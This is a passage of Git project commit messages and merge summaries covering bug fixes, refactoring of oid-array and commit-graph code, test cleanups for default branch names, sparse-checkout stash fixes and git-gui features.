pointing to __git_wrap_main_gitk was left in place.
When "__git_complete gitk __gitk_main" was called, that created the
__git_wrap__gitk_main helper, which is just basically "__git_func_wrap
__gitk_main" plus `complete` options.
Unfortunately the commit b0a4b2d257 (completion: add support for
backwards compatibility, 2012-05-19) missed a previous instance of a
call to _gitk in _git_gitk
So, basically we had __git_wrap__git_main -> __git_func_wrap __git_main ->
__git_complete_command gitk -> _git_gitk -> _gitk ->
__git_wrap__gitk_main -> __git_func_wrap __gitk_main -> __gitk_main.
There was never any need to call __git_func_wrap twice. Since _git_gitk
is always called inside the wrapper, it can call __gitk_main directly.
And then, in commit 441ecdab37 (completion: bash: remove old compat
wrappers, 2020-10-27) _gitk was removed, which triggers the following
error:
_git_gitk:9: command not found: _gitk
Let's call the correct function: __gitk_main.
Cc: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our packed_commit_list is an array of pointers to commit structs. We use
"int" for the allocation, which is 32-bit even on 64-bit platforms. This
isn't likely to overflow in practice (we're writing commit graphs, so
you'd need to actually have billions of unique commits in the
repository). But it's good practice to use size_t for allocations.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our custom packed_oid_list data structure is really just an oid_array in
disguise. Let's switch to using the generic structure, which shortens
and simplifies the code slightly.
There's one slightly awkward part: in the old code we copied a hash
straight from the mmap'd on-disk data into the final object_id. And now
we'll copy to a temporary oid, which we'll then pass to
oid_array_append(). But this is an operation we have to do all over the
commit-graph code already, since it mostly uses object_id structs
internally. I also measured "git commit-graph --append", which triggers
this code path, and it showed no difference.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When writing a commit graph, we collect a list of object ids in an
array, which we'll eventually copy into an array of "struct commit"
pointers. Before we do that, though, we count the number of distinct
commit entries. There's a subtle bug in this step, though.
We eliminate not only duplicate oids, but also in split mode, any oids
which are not commits or which are already in a graph file. However, the
loop starts at index 1, always counting index 0 as distinct. And indeed
it can't be a duplicate, since we check for those by comparing against
the previous entry, and there isn't one for index 0. But it could be a
commit that's already in a graph file, and we'd overcount the number of
commits by 1 in that case.
That turns out not to be a problem, though. The only things we do with
the count are:
- check if our count will overflow our data structures. But the limit
there is 2^31 commits, so while this is a useful check, the
off-by-one is not likely to matter.
- pre-allocate the array of commit pointers. But over-allocating by
one isn't a problem; we'll just waste a few extra bytes.
The bug would be easy enough to fix, but we can observe that neither of
those steps is necessary.
After building the actual commit array, we'll likewise check its count
for overflow. So the extra check of the distinct commit count here is
redundant.
And likewise we use ALLOC_GROW() when building the commit array, so
there's no need to preallocate it (it's possible that doing so is
slightly more efficient, but if we care we can just optimistically
allocate one slot for each oid; I didn't bother here).
So count_distinct_commits() isn't doing anything useful. Let's just get
rid of that step.
Note that a side effect of the function was that we sorted the list of
oids, which we do rely on in copy_oids_to_commits(), since it must also
skip the duplicates. So we'll move the qsort there. I didn't copy the
"TODO" about adding more progress meters. It's actually quite hard to
make a repository large enough for this qsort would take an appreciable
amount of time, so this doesn't seem like a useful note.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We provide oid_array_for_each_unique() for iterating over the
de-duplicated items in an array. But it's awkward to use for two
reasons:
1. It uses a callback, which means marshaling arguments into a struct
and passing it to the callback with a void parameter.
2. The callback doesn't know the numeric index of the oid we're
looking at. This is useful for things like progress meters.
Iterating with a for-loop is much more natural for some cases, but the
caller has to do the de-duping itself. However, we can provide a small
helper to make this easier (see the docstring in the header for an
example use).
The caller does have to remember to sort the array first. We could add
an assertion into the helper that array->sorted is set, but I didn't
want to complicate what is otherwise a pretty fast code path.
I also considered adding a full iterator type with init/next/end
functions (similar to what we have for hashmaps). But it ended up making
the callers much harder to read. This version keeps us close to a basic
for-loop.
Yet another option would be adding an option to sort the array and
compact out the duplicates. This would mean iterating over the array an
extra time, though that's probably not a big deal (we did just do an
O(n log n) sort). But we'd still have to write a for-loop to iterate, so
it doesn't really make anything easier for the caller.
No new test, since we'll convert the callback iterator (which is covered
by t0064, among other callers) to use the new code.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our test suite currently only passes when `git init` uses the name
`master` for the initial branch. This would stop us from changing the
default branch name.
Let's adjust t6300 so that it does not rely on any specific default
branch name. This trick is done by (force-)renaming the initial branch
to the name `main` in the `setup` and the `:remotename and :remoteref`
test cases, and then replacing all mentions of `master` and `MASTER`
with `main` and `MAIN`, respectively.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Split a very long line in a test introduced in 0b691d8685 (pretty:
add support for separator option in %(trailers), 2019-01-28). This
makes it easier to read, especially as follow-up commits will copy
this test as a template.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We sort the oid-array as a side effect of calling the lookup or
unique-iteration functions. But callers may want to sort it themselves
(especially as we add new iteration options in future patches).
We'll also move the check of the "sorted" flag into the sort function,
so callers don't have to remember to check it.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We define git_hash_algo and object_id in hash.h, but most of the utility
functions are declared in the main cache.h. Let's move them to hash.h
along with their struct definitions. This cleans up cache.h a bit, but
also avoids circular dependencies when other headers need to know about
these functions (e.g., if oid-array.h were to have an inline that used
oideq(), it couldn't include cache.h because it is itself included by
cache.h).
No including C files should be affected, because hash.h is always
included in cache.h already.
We do have to mention repository.h at the top of hash.h, though, since
we depend on the_repository in some of our inline functions.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our tests for handling duplicates in oid-array provide only a single
duplicate for each number, so our sorted array looks like:
44 44 55 55 88 88 aa aa
A slightly more interesting test is to have multiple duplicates, which
makes sure that we not only skip the duplicate, but keep skipping until
we are out of the set of matching duplicates.
Unsurprisingly this works just fine, but it's worth beefing up this test
since we're about to change the duplicate-detection code.
Note that we do need to adjust the results on the lookup test, since it
is returning the index of the found item (and now we have more items
before our range, and the range itself is slightly larger, since we'll
accept a match of any element).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The data type is an oid_array these days, and we are using "test-tool
oid-array", so let's name the test script appropriately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When this file was moved from sha1-array.h, we forgot to update the
preprocessor header guard to match the new name.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 0a21d0e089 (Makefile: mark git-maintenance as a builtin,
2020-12-01), we marked git-maintenance as a builtin in the Makefile, but
forgot to do the same in `CMakeLists.txt`.
Rather than always play catch-up and adjust `git_builtin_extra`
manually, use the `BUILT_INS` definitions in the Makefile as
authoritative source and generate `git_builtin_extra` dynamically.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Initially, we started converting this test script in anticipation for
renaming the default branch name to `main`. To that end, we partially
converted it to accommodate for that default branch name, marking the
now-failing test cases with a prereq that was designed to be fulfilled
once the rename was complete.
However, the effort to move to the branch name `main` needs quite a bit
longer, as it was decided that we need a deprecation phase first.
To avoid keeping t5526 in limbo for such a long time, we just made it
independent of the actual default branch name used by Git. Therefore,
that prereq is no longer necessary, and we can drop it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While at it, use different default branch names for the three different
repositories involved in the test script: this makes it easier to debug
failures, too (otherwise you have to wonder which `master` branch was
meant: the super project's? The submodule's? The nested submodule's?).
Note: this touches code that was originally modified to prepare for
renaming the default branch name to `main`. This patch side-steps that
effort completely by overriding the initial branch name explicitly.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Something changed in `vcpkg` (which we use in our Visual C++ build to
provide the dependencies such as libcurl) and our `vs-build` job started
failing in CI. The reason is that we had a work-around in place to help
CMake find iconv, and this work-around is neither needed nor does it
work anymore.
For the full discussion with the vcpkg project, see this comment:
https://github.com/microsoft/vcpkg/issues/14780#issuecomment-735368280
Signed-off-by: Dennis Ameling <dennis@dennisameling.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To keep track of which object filters are allowed or not, 'git
upload-pack' stores the name of each filter in a string_list, and sets
it ->util pointer to be either 0 or 1, indicating whether it is banned
or allowed.
Later on, we attempt to clear that list, but we incorrectly ask for the
util pointers to be free()'d, too. This behavior (introduced back in
6dd3456a8c (upload-pack.c: allow banning certain object filter(s),
2020-08-03)) leads to an invalid free, and causes us to crash.
In order to trigger this, one needs to fetch from a server that (a) has
at least one object filter allowed, and (b) issue a fetch that contains
a subset of the allowed filters (i.e., we cannot ask for a banned
filter, since this causes us to die() before we hit the bogus
string_list_clear()).
In that case, whatever banned filters exist will cause a noop free()
(since those ->util pointers are set to 0), but the first allowed filter
we try to free will crash us.
We never noticed this in the tests because we didn't have an example of
setting 'uploadPackFilter' configuration variables and then following up
with a valid fetch. The first new 'git clone' prevents further
regression here. For good measure on top, add a test which checks the
same behavior at a tree depth greater than 0.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If 'git clone' couldn't execute 'transport_fetch_refs()' (e.g., because
of an error on the remote's side in 'git upload-pack'), then it will
silently ignore it.
Even though this has been the case at least since clone was ported to C
(way back in 8434c2f1af (Build in clone, 2008-04-27)), 'git fetch'
doesn't ignore these and reports any failures it sees.
That suggests that ignoring the return value in 'git clone' is simply an
oversight that should be corrected. That's exactly what this patch does.
(Noticing and fixing this is no coincidence, we'll want it in the next
patch in order to demonstrate a regression in 'git upload-pack' via a
'git clone'.)
There's no additional logging here, but that matches how 'git fetch'
handles the same case. An assumption there is that whichever part of
transport_fetch_refs() fails will complain loudly, so any additional
logging here is redundant.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 6dc905d974 (config: split repo scope to local and worktree,
2020-02-10) made some "if" statements multiline, but didn't indent the
second lines in our usual way.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If we encounter an error in parse_filter_object_config(), we'll complain
to stderr but won't actually propagate the return value up the stack.
This is unlike most of our config callbacks, which return the error to
git_config() so it can die (this includes the call just below us to
parse_hide_refs_config(), which can also produce errors).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
An earlier attempt to fix "git fetch --recurse-submodules" broke
another use case; revert it until a better fix is found.
* pk/subsub-fetch-fix:
Revert "submodules: fix of regression on fetching of non-init subsub-repo"
"git fetch" that is killed may leave a pack-objects process behind,
still computing to find a good compression, wasting cycles. This
has been corrected.
* jk/stop-pack-objects-when-fetch-is-killed:
upload-pack: kill pack-objects helper on signal or exit
"git push" that is killed may leave a pack-objects process behind,
still computing to find a good compression, wasting cycles. This
has been corrected.
* jk/stop-pack-objects-when-push-is-killed:
send-pack: kill pack-objects helper on signal or exit
Simplify the logic to deal with a repack operation that ended up
creating the same packfile.
* tb/repack-simplify:
builtin/repack.c: don't move existing packs out of the way
builtin/repack.c: keep track of what pack-objects wrote
repack: make "exts" array available outside cmd_repack()
"git pull --rebase --recurse-submodules" checked for local changes
in a wrong range and failed to run correctly when it should.
* pb/pull-rebase-recurse-submodules:
pull: check for local submodule modifications with the right range
t5572: describe '--rebase' tests a little more
t5572: add notes on a peculiar test
pull --rebase: compute rebase arguments in separate function
"git-parse-remote" shell script library outlived its usefulness.
* ab/retire-parse-remote:
submodule: fix fetch_in_submodule logic
parse-remote: remove this now-unused library
submodule: remove sh function in favor of helper
submodule: use "fetch" logic instead of custom remote discovery
Versions of docbook-xsl newer than 1.79.1 allows xsltproc to assign
IDs to nodes in the generated HTML consistently, to make the output
resulting from the same source stable and reproducible.
Pass the generate.consistent.ids parameter from the command line to
ask for this feature. Older versions of the tool simply ignores the
parameter and produces their output the same way as before this
change, so there is no need to check for toolchain version.
Signed-off-by: Arnout Engelen <arnout@bzzt.net>
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Helped-by: Todd Zullinger <tmz@pobox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit 1b7ac4e6d4d490b224f5206af7418ed74e490608; in
<CAN0XMOLiS_8JZKF_wW70BvRRxkDHyUoa=Z3ODtB_Bd6f5Y=7JQ@mail.gmail.com>,
Ralf Thielow reports that "git fetch" with submodule.recurse set can
result in a bogus and infinitely recursive fetching of the same
submodule.
The old phrasing is at least questionable, if not wrong, as there are
a lot of branches out there that didn't see active development for
years, yet they are still branches, ready to become active again any
time.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We normally get the list of builtin commands by expanding BUILTIN_OBJS.
But for commands which are embedded inside another's source file (e.g.,
cmd_show() in builtin/log.c), the Makefile needs to be told explicitly
about them.
Since cmd_maintenance() is inside buitin/gc.c, it should be listed
explicitly in the BUILT_INS list in the Makefile. Not doing so isn't
_too_ tragic, as it simply means we will not make a git-maintenance
symlink in libexec/git-core. Since we encourage people to use the "git
foo" form, even in scripts which have put libexec into their PATH,
nobody seems to have noticed.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
core.sharedRepository defines which permissions Git should set when
creating files in $GIT_DIR, so that the repository may be shared with
other users. But (in its current form) the setting shouldn't affect how
files are created in the working tree. This is not respected by apply
and am (which uses apply), when creating leading directories:
$ cat d.patch
diff --git a/d/f b/d/f
new file mode 100644
index 0000000..e69de29
Apply without the setting:
$ umask 0077
$ git apply d.patch
$ ls -ld d
drwx------
Apply with the setting:
$ umask 0077
$ git -c core.sharedRepository=0770 apply d.patch
$ ls -ld d
drwxrws---
Only the leading directories are affected. That's because they are
created with safe_create_leading_directories(), which calls
adjust_shared_perm() to set the directories' permissions based on
core.sharedRepository. To fix that, let's introduce a variant of this
function that ignores the setting, and use it in apply. Also add a
regression test and a note in the function documentation about the use
of each variant according to the destination (working tree or git
dir).
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The ctime_r() and asctime_r() functions are reentrant, but have
no check that the buffer we pass in is long enough (the manpage says it
"should have room for at least 26 bytes"). Since this is such an
easy-to-get-wrong interface, and since we have the much safer strftime()
as well as its more convenient strbuf_addftime() wrapper, let's ban both
of those.
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
b7ce24d095 (Turn `git serve` into a test helper, 2019-04-18) demoted git
serve from a builtin command to a test helper. As a result the
git-serve binary is no longer built and thus doesn't have to be ignored
anymore.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was accidentally added by e00cf070a4 (git-sh-i18n.sh: add no-op
gettext() and eval_gettext() wrappers, 2011-05-14), even though an
earlier commit in the same series had already done so.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A test marked with EXPENSIVE creates two 2.5GB files and adds them to
the repository. This takes 194s to run on my machine, versus 2s when the
EXPENSIVE prereq isn't set. We can trim this down a bit by doing two
things:
- use "git commit --quiet" to avoid spending time generating a diff
summary (this actually only helps for the second commit, but I've
added it here to both for consistency). This shaves off 8s.
- set core.compression to 0. We know these files are full of random
bytes, and so won't compress (that's the point of the test!).
Spending cycles on zlib is pointless. This shaves off 122s.
After this, my total time to run the script is 64s. That won't help
normal runs without GIT_TEST_LONG set, of course, but it's easy enough
to do.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
sparse-checkouts are built on the patterns in the
$GIT_DIR/info/sparse-checkout file, where commands have modified
behavior for paths that do not match those patterns. The differences in
behavior, as far as the bugs concerned here, fall into three different
categories (with git subcommands that fall into each category listed):
* commands that only look at files matching the patterns:
* status
* diff
* clean
* update-index
* commands that remove files from the working tree that do not match
the patterns, and restore files that do match them:
* read-tree
* switch
* checkout
* reset (--hard)
* commands that omit writing files to the working tree that do not
match the patterns, unless those files are not clean:
* merge
* rebase
* cherry-pick
* revert
There are some caveats above, e.g. a plain `git diff` ignores files
outside the sparsity patterns but will show diffs for paths outside the
sparsity patterns when revision arguments are passed. (Technically,
diff is treating the sparse paths as matching HEAD.) So, there is some
internal inconsistency among these commands. There are also additional
commands that should behave differently in the face of sparse-checkouts,
as the sparse-checkout documentation alludes to, but the above is
sufficient for me to explain how `git stash` is affected.
What is relevant here is that logically 'stash' should behave like a
merge; it three-way merges the changes the user had in progress at stash
creation time, the HEAD at the time the stash was created, and the
current HEAD, in order to get the stashed changes applied to the current
branch. However, this simplistic view doesn't quite work in practice,
because stash tweaks it a bit due to two factors: (1) flags like
--keep-index and --include-untracked (why we used two different verbs,
'keep' and 'include', is a rant for another day) modify what should be
staged at the end and include more things that should be quasi-merged,
(2) stash generally wants changes to NOT be staged. It only provides
exceptions when (a) some of the changes had conflicts and thus we want
to use stages to denote the clean merges and higher order stages to
mark the conflicts, or (b) if there is a brand new file we don't want
it to become untracked.
stash has traditionally gotten this special behavior by first doing a
merge, and then when it's clean, applying a pipeline of commands to
modify the result. This series of commands for
unstaging-non-newly-added-files came from the following commands:
git diff-index --cached --name-only --diff-filter=A $CTREE >"$a"
git read-tree --reset $CTREE
git update-index --add --stdin <"$a"
rm -f "$a"
Looking back at the different types of special sparsity handling listed
at the beginning of this message, you may note that we have at least one
of each type covered here: merge, diff-index, and read-tree. The weird
mix-and-match led to 3 different bugs:
(1) If a path merged cleanly and it didn't match the sparsity patterns,
the merge backend would know to avoid writing it to the working tree and
keep the SKIP_WORKTREE bit, simply only updating it in the index.
Unfortunately, the subsequent commands would essentially undo the
changes in the index and thus simply toss the changes altogether since
there was nothing left in the working tree. This means the stash is
only partially applied.
(2) If a path existed in the worktree before `git stash apply` despite
having the SKIP_WORKTREE bit set, then the `git read-tree --reset` would
print an error message of the form
error: Entry 'modified' not uptodate. Cannot merge.
and cause stash to abort early.
(3) If there was a brand new file added by the stash, then the
diff-index command would save that pathname to the temporary file, the
read-tree --reset would remove it from the index, and the update-index
command would barf due to no such file being present in the working
copy; it would print a message of the form:
error: NEWFILE: does not exist and --remove not passed
fatal: Unable to process path NEWFILE
and then cause stash to abort early.
Basically, the whole idea of unstage-unless-brand-new requires special
care when you are dealing with a sparse-checkout. Fix these problems
by applying the following simple rule:
When we unstage files, if they have the SKIP_WORKTREE bit set,
clear that bit and write the file out to the working directory.
(*) If there's already a file present in the way, rename it first.
This fixes all three problems in t7012.13 and allows us to mark it as
passing.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When stash was converted from shell to a builtin, it merely
transliterated the forking of various git commands from shell to a C
program that would fork the same commands. Some of those were converted
over to actual library calls, but much of the pipeline-of-commands
design still remains. Fix some of this by replacing the portion
corresponding to
git diff-index --cached --name-only --diff-filter=A $CTREE >"$a"
git read-tree --reset $CTREE
git update-index --add --stdin <"$a"
rm -f "$a"
into a library function that does the same thing. (The read-tree
--reset was already partially converted over to a library call, but as
an independent piece.) Note here that this came after a merge operation
was performed. The merge machinery always stages anything that cleanly
merges, and the above code only runs if there are no conflicts. Its
purpose is to make it so that when there are no conflicts, all the
changes from the stash are unstaged. However, that causes brand new
files from the stash to become untracked, so the code above first saves
those files off and then re-adds them afterwards.
We replace the whole series of commands with a simple function that will
unstage files that are not newly added. This doesn't fix any bugs in
the usage of these commands, it simply matches the existing behavior but
makes it into a single atomic operation that we can then operate on as a
whole. A subsequent commit will take advantage of this to fix issues
with these commands in sparse-checkouts.
This conversion incidentally fixes t3906.1, because the separate
update-index process would die with the following error messages:
error: uninitialized_sub: is a directory - add files inside instead
fatal: Unable to process path uninitialized_sub
The unstaging of the directory as a submodule meant it was no longer
tracked, and thus as an uninitialized directory it could not be added
back using `git update-index --add`, thus resulting in this error and
early abort. Most of the submodule tests in 3906 continue to fail after
this change, this change was just enough to push the first of those
tests to success.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Applying stashes in sparse-checkouts, particularly when the patterns
used to define the sparseness have changed between when the stash was
created and when it is applied, has a number of bugs. The primary
problem is that stashes are sometimes only partially applied. In most
such cases, it does so silently without any warning or error being
displayed and with 0 exit status.
There are, however, a few cases when non-translated error messages are
shown and the stash application aborts early. The first is when there
are files present despite the SKIP_WORKTREE bit being set, in which case
the error message shown is:
error: Entry 'PATHNAME' not uptodate. Cannot merge.
The other situation is when a stash contains new files to add to the
working tree; in this case, the code aborts early but still has the
stash partially applied, and shows the following error message:
error: NEWFILE: does not exist and --remove not passed
fatal: Unable to process path NEWFILE
Add a test that can trigger all three of these problems. Have it
carefully check that the working copy and SKIP_WORKTREE bits are as
expected after the stash application. The test is currently marked as
expected to fail, but subsequent commits will implement the fixes and
toggle the expectation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The traditional gmtime(), localtime(), ctime(), and asctime() functions
return pointers to shared storage. This means they're not thread-safe,
and they also run the risk of somebody holding onto the result across
multiple calls (where each call invalidates the previous result).
All callers should be using their reentrant counterparts.
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To generate its filename, the 'git bugreport' builtin asks the system
for the current time with 'localtime()'. Since this uses a shared
buffer, it is not thread-safe.
Even though 'git bugreport' is not multi-threaded, using localtime() can
trigger some static analysis tools to complain, and a quick
$ git grep -oh 'localtime\(_.\)\?' -- **/*.c | sort | uniq -c
shows that the only usage of the thread-unsafe 'localtime' is in a piece
of documentation.
So, convert this instance to use the thread-safe version for
consistency, and to appease some analysis tools.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We spawn an external pack-objects process to actually send objects to
the remote side. If we are killed by a signal during this process, then
pack-objects may continue to run. As soon as it starts producing output
for the pack, it will see a failure writing to upload-pack and exit
itself. But before then, it may do significant work traversing the
object graph, compressing deltas, etc, which will all be pointless. So
let's make sure to kill as soon as we know that the caller will not read
the result.
There's no test here, since it's inherently racy, but here's an easy
reproduction is on a large-ish repo like linux.git:
- make sure you don't have pack bitmaps (since they make the enumerating
phase go quickly). For linux.git it takes ~30s or so to walk the
whole graph on my machine.
- run "git clone --no-local -q . dst"; the "-q" is important because
if pack-objects is writing progress to upload-pack (to get
multiplexed over the sideband to the client), then it will notice
pretty quickly the failure to write to stderr
- kill the client-side clone process in another terminal (don't use
^C, as that will send SIGINT to all of the processes)
- run "ps au | grep git" or similar to observe upload-pack dying
within 5 seconds (it will send a keepalive that will notice the
client has gone away)
- but you'll still see pack-objects consuming 100% CPU (and 1GB+ of
RAM) during the traversal and delta compression phases. It will exit
as soon as it starts to write the pack (when it will notice that
upload-pack went away).
With this patch, pack-objects exits as soon as upload-pack does.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a checkbox in the SSH askpass helper to optionally show the input
text which is often a password.
* da/askpass-mask-checkbox:
git-gui: ssh-askpass: add a checkbox to show the input text
Hide the input text by default since the field is
commonly used for sensative informations such as passwords.
Add a "Show input" checkbox to conditionally show the input.
Helped-by: Miguel Boekhold <miguel.boekhold@osudio.com>
Signed-off-by: Efimov Vasily <laer.18@gmail.com>
Signed-off-by: David Aguilar <davvid@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
git imap-send does not parse the default git config settings and thus ignore
core.askpass value.
Rewrite config parsing to support core settings.
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Nicolas Morey-Chaisemartin <nmoreychaisemartin@suse.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach git-gui to read the commit message template and pre-populate it in
the commit message buffer.
* ms/commit-template:
git-gui: use commit message template
git-gui: Only touch GITGUI_MSG when needed
Turns out we always need to set the ignored prefix (compset) to have
similar behavior as in default Bash.
The issue can be seen with:
git show master:<tab>
Commit 94b2901cfe wrongly removed it.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We can remove one level of indentation and make the code clearer.
No functional changes.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Multiple "credential-store" backends can race to lock the same
file, causing everybody else but one to fail---reattempt locking
with some timeout to reduce the rate of the failure.
* sa/credential-store-timeout:
crendential-store: use timeout when locking file
A test script got cleaned up and then made not to depend on the
value of init.defaultBranch.
* js/t3404-master-to-primary:
t3404: do not depend on any specific default branch name
Config parser fix for "git notes".
* na/notes-displayref-is-not-boolean:
t3301: test proper exit response to no-value notes.displayRef.
notes.c: fix a segfault in notes_display_config()
Expectation for the original contributor after responding to a
review comment to use the explanation in a patch update has been
described.
* jc/do-not-just-explain-but-update-your-patch:
MyFirstContribition: answering questions is not the end of the story
Fix formulation of an error message with two placeholders in "git
worktree add" subcommand.
* mt/worktree-error-message-fix:
worktree: fix order of arguments in error message
Fix an option name in "gc" documentation.
* ab/gc-keep-base-option:
gc: rename keep_base_pack variable for --keep-largest-pack
gc docs: change --keep-base-pack to --keep-largest-pack
A test script got cleaned up not to depend on the value of
init.defaultBranch.
* js/t4015-wo-master:
t4015: let the test pass with any default branch name
A test script got cleaned up and then made not to depend on the
value of init.defaultBranch.
* js/t2106-cleanup:
t2106: ensure that the checkout fails for the expected reason
t2106: make test independent of the current main branch name
t2106: adjust style to the current conventions
9da69a6539 (fetch-pack: support more than one pack lockfile, 2020-06-10)
started to use a string_list for pack lockfile names instead of a single
string pointer. It removed a NULL check from transport_unlock_pack() as
well, which is the function that eventually deletes these lockfiles and
releases their name strings.
index_pack_lockfile() can return NULL if it doesn't like the contents it
reads from the file descriptor passed to it. unlink(2) is declared to
not accept NULL pointers (at least with glibc). Undefined Behavior
Sanitizer together with Address Sanitizer detects a case where a NULL
lockfile name is passed to unlink(2) by transport_unlock_pack() in t1060
(make SANITIZE=address,undefined; cd t; ./t1060-object-corruption.sh).
Reinstate the NULL check to avoid undefined behavior, but put it right
at the source, so that the number of items in the string_list reflects
the number of valid lockfiles.
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since commit 9ba89f484e git learned how to push to a remote branch using
the source @, for example:
git push origin @:master
However, if the right-hand side is missing, the push fails:
git push origin @
It is obvious what is the desired behavior, and allowing the push makes
things more consistent.
Additionally, @:master now has the same semantics as HEAD:master.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
So that we are not left in an inconsistent state between them.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a recent commit, we stopped calling `init_grep_defaults()` from this
function. Thus, by the end of the tutorial, we still haven't added any
contents to this function. Let's remove it for simplicity.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have a `struct grep_opt` with our defaults which we then copy into
the caller's struct. Rather than zeroing the target struct and copying
each element one by one, just copy everything at once. This leaves the
code simpler and more maintainable.
We don't have any ownership issues with what we're copying now and can
just greedily copy the whole thing. If and when we do need to handle
such elements (`char *`?), we must and can handle it appropriately. Make
sure to leave a comment to our future selves.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Simplify test and make error messages more clear here.
Per feedback from Junio in
33226af42b (t/perf/fsmonitor: improve error message if typoing hook
name, 2020-10-26)
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git maintenance run" and "git maintenance start/stop" commands
holds a file-based lock at the .git/maintenance.lock and
.git/schedule.lock respectively. These locks are used to ensure only
one maintenance process is executed at the time as both operations
involves writing data into the git repository.
The path to the lock file is built using
"the_repository->objects->odb->path" that results in SEGFAULT when we
have no repository available as "the_repository->objects->odb" is
set to NULL.
Let's teach maintenance command to use RUN_SETUP option that will
provide the validation and fail when running outside of a repository.
Hence fixing the SEGFAULT for all three operations and making the
behaviour consistent across all subcommands.
Setting the RUN_SETUP also provides the same protection for all
subcommands given that the "register" and "unregister" also requires to
be executed inside a repository.
Furthermore let's remove the local validation implemented by the
"register" and "unregister" as this will not be required anymore with
the new option.
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the file described by commit.template (if set) to show the commit message
template, just like other GUIs.
Signed-off-by: Martin Schön <Martin.Schoen@loewensteinmedical.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
